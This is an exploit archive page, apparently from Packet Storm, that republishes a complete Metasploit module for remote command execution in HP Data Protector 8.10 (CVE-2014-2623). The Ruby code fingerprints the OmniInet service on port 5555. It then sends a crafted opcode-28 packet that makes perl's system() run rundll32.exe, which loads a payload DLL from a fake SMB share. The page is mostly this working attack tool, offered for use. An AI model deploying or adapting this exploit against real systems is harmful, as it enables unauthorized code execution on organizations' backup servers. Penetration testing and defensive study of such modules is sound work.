exploit the possibilities

HP Data Protector 8.10 Remote Command Execution

HP Data Protector 8.10 Remote Command Execution
Posted Mar 5, 2015
Authored by Christian Ramirez, Henoch Barrera | Site metasploit.com

This Metasploit module exploits a remote command execution on HP Data Protector 8.10. Arbitrary commands can be execute by sending crafted requests with opcode 28 to the OmniInet service listening on the TCP/5555 port. Since there is an strict length limitation on the command, rundll32.exe is executed, and the payload is provided through a DLL by a fake SMB server. This Metasploit module has been tested successfully on HP Data Protector 8.1 on Windows 7 SP1.

tags | exploit, remote, arbitrary, tcp
systems | windows, 7
advisories | CVE-2014-2623
MD5 | 7d0e14569e8f640a3bc4fd60081400d4

HP Data Protector 8.10 Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => 'HP Data Protector 8.10 Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary
commands can be execute by sending crafted requests with opcode 28 to the OmniInet
service listening on the TCP/5555 port. Since there is an strict length limitation on
the command, rundll32.exe is executed, and the payload is provided through a DLL by a
fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on
Windows 7 SP1.
},
'Author' => [
'Christian Ramirez', # POC
'Henoch Barrera', # POC
'Matthew Hall <hallm[at]sec-1.com>' # Metasploit Module
],
'References' =>
[
['CVE', '2014-2623'],
['OSVDB', '109069'],
['EDB', '34066'],
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Privileged' => true,
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'HP Data Protector 8.10 / Windows', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 02 2014'))

register_options(
[
Opt::RPORT(5555),
OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
], self.class)

deregister_options('FILE_CONTENTS')
end

def check
fingerprint = get_fingerprint

if fingerprint.nil?
return Exploit::CheckCode::Unknown
end

print_status("#{peer} - HP Data Protector version #{fingerprint}")

if fingerprint =~ /HP Data Protector A\.08\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end

if minor < 11
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Detected
end

def peer
"#{rhost}:#{rport}"
end

def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect

if resp.nil?
return nil
end

Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
end

def send_pkt(cmd)
cmd.gsub!("\\", "\\\\\\\\")

pkt = "2\x00"
pkt << "\x01\x01\x01\x01\x01\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x00"
pkt << "\x01\x01\x00 "
pkt << "28\x00"
pkt << "\\perl.exe\x00 "
pkt << "-esystem('#{cmd}')\x00"

connect
sock.put([pkt.length].pack('N') + pkt)
disconnect
end

def primer
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")

print_status("#{peer} - Trying to execute remote DLL...")
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
send_pkt(sploit)
end

def setup
super

self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"

unless file_name =~ /\.dll$/
fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
end
end

def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) {super}
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
end
end
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close